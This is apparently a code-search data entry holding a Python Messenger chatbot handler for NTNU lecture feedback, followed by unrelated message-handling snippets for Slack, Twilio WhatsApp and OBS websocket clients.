form: [TAG][CODE]\\n\"\n \"ex. TDT4120\"))\n send_message(PAT, response_handler.text_message(sender, \"If you want to see your currently selected course \"\n \"and other information type 'Status'.\"))\n send_message(PAT, response_handler.text_message(sender, \"You can also type 'Hei' or 'Hallo' at any time \"\n \"to receive a greeting that shows your options.\"))\n send_message(PAT, response_handler.text_message(sender, \"Here is a list of commands you can use. This is \"\n \"recommended for the experienced user:\\n\"\n \"Change subject\\n\"\n \"Give feedback\\n\"\n \"How did today's lecture go?\\n\"\n \"Get schedule\\n\"\n \"Get info\\n\"\n \"All lectures\\n\"\n \"A specific lecture\\n\"\n \"You can type most of the commands in chat. Just \"\n \"give it a try!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif \"status\" in incoming_message.lower():\n subject = user_methods.get_subject_from_user(user_name)\n year = feedback_methods.get_year()\n week = feedback_methods.get_week()\n day = feedback_methods.get_day()\n user = get_full_name(sender, PAT)\n lecture_id_current = lecture_methods.get_lecture_from_date(year, week, day, subject)\n lecture = feedback_methods.get_lecture_object(lecture_id_current)\n\n if user_methods.has_user(user_name):\n sub = user_methods.get_subject_from_user(user_name) + \" : \" + \\\n subject_info.course_name(user_methods.get_subject_from_user(user_name))\n send_message(PAT, response_handler.user_info(sender, user_name, sub))\n if feedback_methods.user_has_feedback_for_lecture(user, lecture):\n send_message(PAT, response_handler.text_message(sender, \"You have given feedback for \"\n + subject + \"today. Well done! 
Be proud of \"\n \"yourself and remember to check in \"\n \"tomorrow.\"))\n send_message(PAT,\n response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"No feedback for the given lecture on this date. \"\n \"Please press 'Give Feedback' or write it in the \"\n \"chat to do so.\"))\n send_message(PAT,\n response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"We seem to not be able to detect you in the database. \"\n \"Please report this to the staff!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n # Checks if the subject has lectures in the database, adds them if not.\n\n elif payload == \"give feedback\" or \"give feedback\" in incoming_message.lower():\n send_message(PAT, response_handler.give_feedback_choice(sender))\n\n elif payload == \"lecture speed\" or \"lecture speed\" in incoming_message.lower():\n\n subject = user_methods.get_subject_from_user(user_name)\n\n if lecture_methods.check_lecture_in_db(subject):\n send_message(PAT, response_handler.lec_feed(sender))\n else:\n schedule = subject_info.get_schedule(subject)\n if schedule:\n database_entry = subject_info.gather_lecture_information(schedule)\n lecture_methods.add_lecture_information_db(database_entry)\n send_message(PAT, response_handler.text_message(sender, \"Lectures for the subject \" + subject +\n \" were not in the database. It is now added.\"))\n send_message(PAT, response_handler.lec_feed(sender))\n else:\n send_message(PAT, response_handler.text_message(sender, \"Lectures for the subject \" + subject +\n \" does not exist. Likely due to the subject having \"\n \"no lectures this semester.\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n\n elif payload == \"evaluation_questions\" or \"lecture questions\" in incoming_message.lower():\n # User wants to give feedback for a lecture.\n subject = user_methods.get_subject_from_user(user_name)\n payload = \"evaluation_questions\" # if user typed 'lecture questions' the payload will be None\n\n if lecture_methods.check_lecture_in_db(subject):\n if feedback_methods.user_can_give_feedback_evaluation(user_name,\n user_methods.get_subject_from_user(user_name)):\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"Feedback can not be given either because there \"\n \"is no lecture today, or because you have already \"\n \"given feedback for this lecture.\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n else:\n schedule = subject_info.get_schedule(subject)\n if schedule:\n database_entry = subject_info.gather_lecture_information(schedule)\n lecture_methods.add_lecture_information_db(database_entry)\n send_message(PAT, response_handler.text_message(sender, \"Lectures for the subject \" + subject +\n \" were not in the database. 
It is now added\"))\n if feedback_methods.user_can_give_feedback_evaluation(user_name,\n user_methods.get_subject_from_user(\n user_name)):\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"Feedback can not be given either because \"\n \"there is no lecture today, or because you\"\n \" have already given feedback for this lecture.\"\n \"\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n else:\n send_message(PAT, response_handler.text_message(sender, \"Lectures for the subject \" + subject +\n \"does not exist. Likely due to the subject having \"\n \"no \"\n \"lectures this semester.\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n\n elif \"too slow\" in incoming_message.lower():\n # Adds feedback if the subject has a lecture on the given day\n # and if the user has not already given feedback\n payload = '0'\n message_response = \"too slow\"\n if feedback_methods.add_entry(user_name, user_methods.get_subject_from_user(user_name), payload):\n send_message(PAT, response_handler.text_message(sender, \"You chose: \" + \"'\" +\n message_response + \"'\" + \"\\nFeedback Received!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"There is either no lecture active in the selected\"\n \" subject, or you have already given feedback\"\n \" to the active lecture.\\nFeedback denied!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif \"it's all right\" in incoming_message.lower() or \"its all right\" in incoming_message.lower():\n # Adds feedback if the subject has a lecture on the given day\n # and if the user has not already given feedback\n payload = '1'\n message_response = \"It's all right\"\n if feedback_methods.add_entry(user_name, user_methods.get_subject_from_user(user_name), payload):\n send_message(PAT, response_handler.text_message(sender, \"You chose: \" + \"'\" +\n message_response + \"'\" + \"\\nFeedback Received!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"There is either no lecture active in the selected\"\n \" subject, or you have already given feedback\"\n \" to the active lecture.\\nFeedback denied!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif \"too fast\" in incoming_message.lower():\n # Adds feedback if the subject has a lecture on the given day\n # and if the user has not already given feedback\n payload = '2'\n message_response = \"too fast\"\n if feedback_methods.add_entry(user_name, user_methods.get_subject_from_user(user_name), payload):\n send_message(PAT, response_handler.text_message(sender, \"You chose: \" + \"'\" +\n message_response + \"'\" + \"\\nFeedback Received!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"There is either no lecture active in the selected\"\n \" subject, or you have already given feedback\"\n \" to the active lecture.\\nFeedback denied!\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif (\"today\" in 
incoming_message.lower() and \"lecture\" in incoming_message.lower()) or \\\n (\"todays\" in incoming_message.lower() and \"lecture\" in incoming_message.lower()) or \\\n (\"today's\" in incoming_message.lower() and \"lecture\" in incoming_message.lower()):\n # Gathers the correct information about the date.\n year = feedback_methods.get_year()\n week = feedback_methods.get_week()\n day = feedback_methods.get_day()\n subject = user_methods.get_subject_from_user(user_name)\n # Gathers the feedback from today's lecture:\n if lecture_methods.check_lecture_in_db(subject):\n feedback_list = feedback_methods.get_single_lecture_feed(year, week, day, subject)\n if feedback_list[0] is not None:\n send_message(PAT, response_handler.present_single_lecture_feedback(sender, feedback_list))\n send_message(PAT,\n response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"No feedback for the given lecture on this date. \"\n \"Please try again at a later date.\"))\n send_message(PAT,\n response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.text_message(sender, \"No lecture present in the database. \"\n \"Please provide some feedback and try again.\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload == \"get schedule\" or \"get schedule\" in incoming_message.lower():\n subject = user_methods.get_subject_from_user(user_name)\n schedule = subject_info.printable_schedule(subject_info.get_schedule(subject))\n if len(schedule) > 640:\n msg_list = message_split.message_split(schedule)\n for msg in msg_list:\n print(msg)\n send_message(PAT, response_handler.text_message(sender, msg))\n else:\n send_message(PAT, response_handler.text_message(sender, schedule))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload == \"get info\" or \"get info\" in incoming_message.lower():\n subject = user_methods.get_subject_from_user(user_name)\n send_message(PAT, response_handler.text_message(sender,\n subject_info.printable_course_info(\n subject_info.get_course_json(subject))))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload == \"get feedback\" or \"get feedback\" in incoming_message.lower():\n send_message(PAT, response_handler.get_feedback_specific_or_all(sender))\n\n elif payload == \"all_lectures\" or \"all lectures\" in incoming_message.lower():\n # The user wants to see feedback for all lectures in the selected subject\n subject = user_methods.get_subject_from_user(user_name)\n if not lecture_methods.check_lecture_in_db(subject):\n send_message(PAT, response_handler.text_message(sender, \"Course has no feedback.\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n feedback, feedbackevaluation = feedback_methods.get_all_subject_feed(subject)\n if len(feedback) > 0:\n percent_list = bot_feedback.generate_percent_for_speed(feedback)\n send_message(PAT, response_handler.all_feedback_speed(sender, subject, percent_list))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"Course has no feedback for lecture speed.\"))\n if len(feedbackevaluation) > 0:\n percent_list_questions = bot_feedback.generate_percent_for_questions(feedbackevaluation)\n\n send_message(PAT, 
response_handler.all_feedback_questions(sender, subject, percent_list_questions))\n else:\n send_message(PAT,\n response_handler.text_message(sender, \"Course has no feedback for lecture questions.\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload == \"a_specific_lecture\" or \"a specific lecture\" in incoming_message.lower():\n # Let the user choose what year to get feedback from.\n years = lecture_feedback_db_methods.get_year(user_methods.get_subject_from_user(user_name))\n if len(years) > 0:\n send_message(PAT, response_handler.get_feedback_year(sender, years))\n else:\n send_message(PAT, response_handler.text_message(sender, 'No feedback for the selected subject.'))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif payload is not None:\n # Underneath are check that use .split() on the payload.\n if \"evaluation_questions\" in payload.split()[0]:\n payload_split = payload.split()\n if len(payload_split) == 1:\n # 1st question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 2:\n # 2nd question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 3:\n # 3rd question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 4:\n # 4th question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 5:\n # 5th question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 6:\n # 6th question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 7:\n # 7th question\n send_message(PAT, response_handler.lecture_feedback_questions(sender, payload))\n elif len(payload_split) == 8:\n # store feedback.\n subject = user_methods.get_subject_from_user(user_name)\n if feedback_methods.add_feedback_evaluation(user_name, subject, int(payload_split[1]),\n int(payload_split[2]), int(payload_split[3]),\n int(payload_split[4]), int(payload_split[5]),\n int(payload_split[6]), int(payload_split[7])):\n # Storing the feedback succeeded.\n send_message(PAT, response_handler.text_message(sender, 'Feedback received!'))\n send_message(PAT, response_handler.has_course(sender, subject))\n else:\n # Storing the feedback failed.\n send_message(PAT, response_handler.text_message(sender,\n \"There is either no lecture active in the \"\n \"selected subject, or you have already given \"\n \"feedback to the active lecture.\\n Feedback \"\n \"denied!\"))\n send_message(PAT, response_handler.has_course(sender, subject))\n pass\n\n elif \"get_lecture_feedback_year\" in payload.split()[0]:\n # Let the user choose what semester to get feedback from.\n semesters = []\n if lecture_feedback_db_methods.check_lecture_semester(user_methods.get_subject_from_user(user_name),\n 1, 17, int(payload.split()[1])):\n semesters.append('Spring')\n elif lecture_feedback_db_methods.check_lecture_semester(user_methods.get_subject_from_user(user_name),\n 32, 49, int(payload.split()[1])):\n semesters.append('Fall')\n if len(semesters) > 0:\n send_message(PAT, response_handler.get_feedback_semester(sender, payload.split()[1], semesters))\n else:\n # Take the user one step up to choose a different year.\n years = 
lecture_feedback_db_methods.get_year(user_methods.get_subject_from_user(user_name))\n send_message(PAT, response_handler.get_feedback_year(sender, years))\n\n elif \"get_lecture_feedback_semester\" in payload.split()[0]:\n # Let the user choose what weeks to get feedback from.\n\n week_list = lecture_feedback_db_methods.get_lecture_weeks(user_methods.get_subject_from_user(user_name),\n int(payload.split()[1]), payload.split()[2])\n if len(week_list) > 8:\n send_message(PAT, response_handler.get_feedback_month(sender, payload.split()[1], week_list))\n else:\n send_message(PAT, response_handler.get_feedback_week(sender, payload.split()[1], week_list))\n\n elif \"get_lecture_feedback_month\" in payload.split()[0]:\n # Let the user select week\n week_list = []\n payload_split = payload.split()\n for i in range(2, len(payload_split)):\n week_list.append(int(payload_split[i].rstrip(',')))\n\n send_message(PAT, response_handler.get_feedback_week(sender, payload_split[1], week_list))\n\n elif \"get_lecture_feedback_week\" in payload.split()[0]:\n # Lets the user select day\n lecture_days = lecture_feedback_db_methods.get_day_of_lecture_in_week(\n user_methods.get_subject_from_user(user_name), payload.split()[1], payload.split()[2])\n\n send_message(PAT, response_handler.get_feedback_day(sender, payload.split()[1], lecture_days,\n payload.split()[2]))\n\n elif \"get_lecture_feedback_day\" in payload.split()[0]:\n\n subject = user_methods.get_subject_from_user(user_name)\n # Gives the user feedback from the selected day.\n feedback_list = feedback_methods.get_single_lecture_feed(payload.split()[1],\n payload.split()[2],\n payload.split()[3],\n subject)\n feedback_questions_list = feedback_methods.get_single_lecture_feedback_questions(payload.split()[1],\n payload.split()[2],\n payload.split()[3],\n subject)\n\n if len(feedback_list[1]) > 0: # Checks if there is feedback in the variable.\n send_message(PAT, response_handler.present_single_lecture_feedback(sender, feedback_list))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"This lecture has no feedback for lecture speed.\"))\n if len(feedback_questions_list) > 0: # Checks if there is feedback in the variable.\n feedback_questions = bot_feedback.generate_percent_for_questions(feedback_questions_list)\n send_message(PAT,\n response_handler.present_single_lecture_feedback_questions(sender, feedback_questions))\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"This lecture has no feedback for lecture \"\n \"questions.\"))\n\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif ime_data_fetch.subject_exists_boolean(incoming_message.upper().split()[0]):\n if user_methods.has_user(user_name):\n user_methods.add_subject(user_name, incoming_message.split()[0])\n else:\n user_methods.add_user(user_name, incoming_message.split()[0])\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n else:\n send_message(PAT, response_handler.text_message(sender,\n \"Type 'help' to see what you can do with L.I.M.B.O.\\n If \"\n \"you tried to enter a subject-code and got this message,\"\n \" you either misspelled it or the subject you are looking \"\n \"for is not a subject at NTNU.\"))\n if user_methods.has_user(user_name):\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.no_course(sender))\n\n return \"ok\"", "def 
msg_event(self, event):\r\n pass", "def respond_to_events(self):\n event_response = MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events)\n\n if event_response == []:\n return {}\n return event_response[0]", "def on_message(data):\n pass", "def list_messages(self):", "def _handle_message(self, msg):\n self.event('message', msg)", "def receive_message(self, context, message):\r\n pass", "def receive_message(self, message):", "def listen_for_any_message(self, msg, match):\n question=\"{}\".format(msg)\n return self.cbmodel.get_response(question)", "def handle_message(self, msg):\n pass", "def get_response(self):\n return self.messages", "def get_messages(self):\n print(\"Adding callback...\")\n self.__class__.callbacks.add(self._callback)\n #print(self.__class__.callbacks)", "def handle_event(event_data):\n # define variable of data\n message = event_data.get('event')\n channel = message.get('channel')\n msg = message.get('text').lower()\n userid = message.get('user')\n username = convert_unicode(sc.api_call('users.info', user=userid)).get('user').get('profile').get('display_name')\n text = None\n print(msg)\n\n if \"tasks\" in msg or \"task\" in msg:\n ret_data = fb.display_list('Business', False)\n ret_data = filter(lambda x:username in [names.strip() for names in x[2].split(',')], ret_data)\n text = \"Click <http://team8tasks.serveo.net|here> to go to the Task Website\\n\"\n ongoing_tasks = return_tasks(ret_data, 'ongoing')\n overdue_tasks = return_tasks(ret_data, 'overdue')\n completed_tasks = return_tasks(ret_data, 'completed')\n sc.api_call('chat.postMessage', channel=channel, text=text, as_user=True, attachments=[{'text': ongoing_tasks, 'mrkdwn_in': [\"text\"], 'color': '#03572C'}, {'text': overdue_tasks, 'mrkdwn_in': [\"text\"], 'color': '#ff6666'}, {'text': completed_tasks, 'mrkdwn_in': [\"text\"]}])\n return\n elif \"hello\" in msg or \"hi\" in msg or \"hey\" in msg:\n text = \"Hello <@\" + userid + \">! What's up?\"\n elif \"no u\" in msg:\n text = \"no u\"\n else:\n text = 'Sorry I do not know what that command means. Try \"tasks\" to list your tasks.'\n\n sc.api_call('chat.postMessage', channel=channel, text=text, as_user=True)", "def messages(self) -> dict:\n raise NotImplementedError", "def handleMessage(msg):", "def send_messages(self):\n if self.messages:\n messages, self.messages = self.messages, []\n self.mpub(\"events.%s\" % config.pool, messages)", "def message(self):\r\n url = '{0}/{1}'.format(self.get_url(), 'message')\r\n return http.Request('GET', url), parsers.parse_json", "def onMessage(self, message):\n raise NotImplementedError", "def _on_message(self, raw_msg):\n strmsg = raw_msg.decode()\n msg = json.loads(strmsg)\n\n print(msg)\n\n if self._handlers.get(msg['msgid']):\n for handler in self._handlers[msg['msgid']]:\n handler.handle(msg)", "def processMessage(self, *args, **kwargs):\r\n pass", "def receive_message(self, message):\r\n return", "def get_messages(self):\r\n return self.messages", "def get_message(self):\n\n if self.gotten: return\n self.get_recipients()\n self.get_text()\n self.get_price()\n self.get_files()\n self.set_text()\n if Settings.get_performer_category() or self.hasPerformers:\n self.get_performers()\n else:\n self.performers = \"unset\"\n self.gotten = True", "def on_event():\n event = request.get_json()\n if event['type'] == 'ADDED_TO_SPACE' and not event['space']['singleUserBotDm']:\n text = 'Thanks for adding me to \"%s\"!' 
% (event['space']['displayName'] if event['space']['displayName'] else 'this chat')\n elif event['type'] == 'MESSAGE':\n text = 'You said: `%s`' % str(chat_service.spaces().list().execute()) #event['message']['text']\n else:\n return\n return json.jsonify({'text': text, 'thread':\"chet_cool\"})", "def run(self):\n alogger.info(\"Recieved message from %s, Message: (%d) %s\" % (self.client.getaddress(), self.action_type, self.message))\n \n #Try to call th function associated with this message type.\n #format = \"handle_<type>\" (eg: handle_100)\n fn = globals().get(\"handle_\" + str(self.action_type))\n if fn and callable(fn):\n fn(self.message, self.address, self.client)\n else:\n alogger.info(\"Received unknown message from %d, type: %d\" % (self.client.getaddress(), self.action_type))", "def msg_handler(self, msg):\n self.view.frame.log.append(msg)", "def process_chatter(self, msg):\n # note, nothing in here is ROS specific, it's just python code that\n # runs when new info appears\n\n print msg.data # print the recieved message\n\n self.msgs_recieved += 1 # increase msg count\n self.msgs_recieved %= 500 # mod 500 so we don't get enormous numbers\n self.msg = \"%d messages recieved\" % self.msgs_recieved # set message", "def handle_messages(self):\n\n #Get the time at which the code started running\n current_time = datetime.datetime.now()\n\n #get all messages between now and the time where a message was last received\n messages = self.client.messages.list(\n date_sent_before = datetime.datetime.now()+ datetime.timedelta(hours = TIMEDIFFERENCE),\n date_sent_after = self.last_message_timing + datetime.timedelta(hours = TIMEDIFFERENCE)\n )\n\n #Iterate through all the new messages\n for record in messages:\n #If it is not from the Twilio Client\n if record.from_ != 'whatsapp:+14155238886':\n #Then update the timing of the last message to the current time\n self.last_message_timing = current_time\n #If the message sent is the '?' 
that seeks to get the number\n #of people in the queue\n if record.body == '?':\n #Get the data about people from firebase\n people_data = self.firebase.get_data('people_count')\n #Get the number of people queueing\n no_of_people = people_data['people_count']\n #Create a message from the API to tell the person\n #asking the number of people in the queue\n message = self.client.messages.create(\n body='The number of the people in the queue is {}'.format(no_of_people),\n from_='whatsapp:{sender_number}'.format(**self.config),\n to=record.from_\n )", "def handle(self, message):", "def handle(self) -> None:\r\n\r\n if self.data.get(\"message-id\") != None:\r\n if self.data[\"status\"] == \"error\":\r\n print(self.data[\"error\"])\r\n return\r\n else:\r\n requestData = self.obs.pendingResponses.pop(self.data[\"message-id\"])\r\n request = requestData[\"request-type\"]\r\n #Requests as of version 4.8.0\r\n\r\n #General\r\n if request == \"GetVersion\":\r\n pass\r\n\r\n elif request == \"GetAuthRequired\":\r\n if self.data[\"authRequired\"]:\r\n secret_string: str = self.obs.password + self.data[\"salt\"]\r\n secret_hash: sha256 = sha256(secret_string.encode(\"utf-8\"))\r\n secret: bytes = b64encode(secret_hash.digest())\r\n\r\n response_string: str = secret.decode(\"utf-8\") + self.data[\"challenge\"]\r\n response_hash: sha256 = sha256(response_string.encode(\"utf-8\"))\r\n response: bytes = b64encode(response_hash.digest())\r\n\r\n self.obs.requests.append({\r\n \"type\": \"Authenticate\",\r\n \"auth\": response.decode(\"utf-8\")})\r\n\r\n else:\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"Authenticate\":\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"SetHeartbeat\":\r\n #To be removed in 5.0.0\r\n pass\r\n\r\n elif request == \"SetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetStats\":\r\n pass\r\n\r\n elif request == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n elif request == \"GetVideoInfo\":\r\n pass\r\n\r\n elif request == \"OpenProjector\":\r\n pass\r\n\r\n elif request == \"TriggerHotkeyByName\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"TriggerHotkeyBySequence\":\r\n #Unreleased\r\n pass\r\n\r\n #Media Control\r\n elif request == \"PlayPauseMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"RestartMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StopMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"NextMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"PreviousMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaDuration\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"SetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"ScrubMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaState\":\r\n #Unreleased\r\n pass\r\n\r\n #Sources\r\n\r\n elif request == \"GetMediaSourcesList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSourcesList\":\r\n pass\r\n\r\n elif request == \"GetSourceTypesList\":\r\n pass\r\n\r\n elif request == \"GetVolume\":\r\n pass\r\n\r\n elif request == \"SetVolume\":\r\n pass\r\n\r\n elif request == \"GetMute\":\r\n pass\r\n\r\n elif request == \"SetMute\":\r\n pass\r\n\r\n elif request == \"ToggleMute\":\r\n pass\r\n\r\n elif request == \"GetAudioActive\":\r\n pass\r\n\r\n elif request == \"SetSourceName\":\r\n pass\r\n\r\n elif request == 
\"SetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSourceSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceSettings\":\r\n pass\r\n\r\n elif request == \"GetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"SetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"GetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"SetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"GetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"SetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"GetSpecialSources\":\r\n pass\r\n\r\n elif request == \"GetSourceFilters\":\r\n source = self.obs.getSource(requestData[\"sourceName\"])\r\n if source != None:\r\n for _filter in self.data[\"filters\"]:\r\n source.addFilter(_filter) #type: ignore\r\n\r\n elif request == \"GetSourceFilterInfo\":\r\n pass\r\n\r\n elif request == \"AddFilterToSource\":\r\n pass\r\n\r\n elif request == \"RemoveFilterFromSource\":\r\n pass\r\n\r\n elif request == \"ReorderSourceFilter\":\r\n pass\r\n\r\n elif request == \"MoveSourceFilter\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterVisibility\":\r\n pass\r\n \r\n elif request == \"GetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"SetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"TakeSourceScreenshot\":\r\n pass\r\n\r\n #Outpute\r\n elif request == \"ListOutputs\":\r\n pass\r\n\r\n elif request == \"GetOutputInfo\":\r\n pass\r\n\r\n elif request == \"StartOutput\":\r\n pass\r\n\r\n elif request == \"StopOutput\":\r\n pass\r\n\r\n #Profiles\r\n elif request == \"SetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"GetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"ListProfiles\":\r\n pass\r\n\r\n #Recording\r\n elif request == \"GetRecordingStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopRecording\":\r\n pass\r\n\r\n elif request == \"StartRecording\":\r\n pass\r\n\r\n elif request == \"StopRecording\":\r\n pass\r\n\r\n elif request == \"PauseRecording\":\r\n pass\r\n\r\n elif request == \"ResumeRecording\":\r\n pass\r\n\r\n elif request == \"SetRecordingFolder\":\r\n pass\r\n\r\n elif request == \"GetRecordingFolder\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif request == \"GetReplayBufferStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StartReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"SaveReplayBuffer\":\r\n pass\r\n\r\n #Scene Collections\r\n elif request == \"SetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"GetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"ListSceneCollections\":\r\n pass\r\n\r\n #Scene Items\r\n elif request == \"GetSceneItemList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"SetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"ResetSceneItem\":\r\n pass\r\n\r\n elif request == \"SetSceneItemRender\":\r\n pass\r\n\r\n elif request == \"SetSceneItemPosition\":\r\n pass\r\n\r\n elif request == \"SetSceneItemTransform\":\r\n pass\r\n\r\n elif request == \"SetSceneItemCrop\":\r\n pass\r\n\r\n elif request == \"DeleteSceneItem\":\r\n pass\r\n\r\n elif request == \"AddSceneItem\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"DuplicateSceneItem\":\r\n pass\r\n\r\n #Scenes\r\n elif request == 
\"SetCurrentScene\":\r\n pass\r\n\r\n elif request == \"GetCurrentScene\":\r\n self.obs.setCurrentScene(self.data[\"name\"])\r\n\r\n elif request == \"GetSceneList\":\r\n for scene in self.data[\"scenes\"]:\r\n self.obs.addScene(scene)\r\n self.obs.setCurrentScene(self.data[\"current-scene\"])\r\n\r\n elif request == \"CreateScene\":\r\n pass\r\n\r\n elif request == \"ReorderSceneItems\":\r\n pass\r\n\r\n elif request == \"SetSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"RemoveSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"GetSceneTransitionOverride\":\r\n pass\r\n\r\n #Streaming\r\n elif request == \"GetStreamingStatus\":\r\n pass\r\n\r\n elif request == \"StartStopStreaming\":\r\n pass\r\n\r\n elif request == \"StartStreaming\":\r\n pass\r\n\r\n elif request == \"StopStreaming\":\r\n pass\r\n\r\n elif request == \"SetStreamSettings\":\r\n pass\r\n\r\n elif request == \"GetStreamSettings\":\r\n pass\r\n\r\n elif request == \"SaveStreamSettings\":\r\n pass\r\n\r\n elif request == \"SendCaptions\":\r\n pass\r\n\r\n #Studio Mode\r\n elif request == \"GetStudioModeStatus\":\r\n pass\r\n\r\n elif request == \"GetPreviewScene\":\r\n pass\r\n\r\n elif request == \"SetPreviewScene\":\r\n pass\r\n\r\n elif request == \"TransitionToProgram\":\r\n pass\r\n\r\n elif request == \"EnableStudioMode\":\r\n pass\r\n\r\n elif request == \"DisableStudioMode\":\r\n pass\r\n\r\n elif request == \"ToggleStudioMode\":\r\n pass\r\n\r\n #Transitions\r\n elif request == \"GetTransitionList\":\r\n pass\r\n\r\n elif request == \"GetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionPosition\":\r\n pass\r\n\r\n else:\r\n print(f\"Unhandled response of type {request} and data {self.data}.\")\r\n\r\n \r\n\r\n else:\r\n event: str = self.data[\"update-type\"]\r\n #Events as of 4.8.0\r\n\r\n #Scenes\r\n if event == \"SwitchScenes\":\r\n self.obs.setCurrentScene(self.data[\"scene-name\"])\r\n\r\n elif event == \"ScenesChanged\":\r\n #self.obs.purgeScenes()\r\n pass\r\n\r\n elif event == \"SceneCollectionChanged\":\r\n pass\r\n\r\n elif event == \"SceneCollectionListChanged\":\r\n pass\r\n\r\n #Transitions\r\n 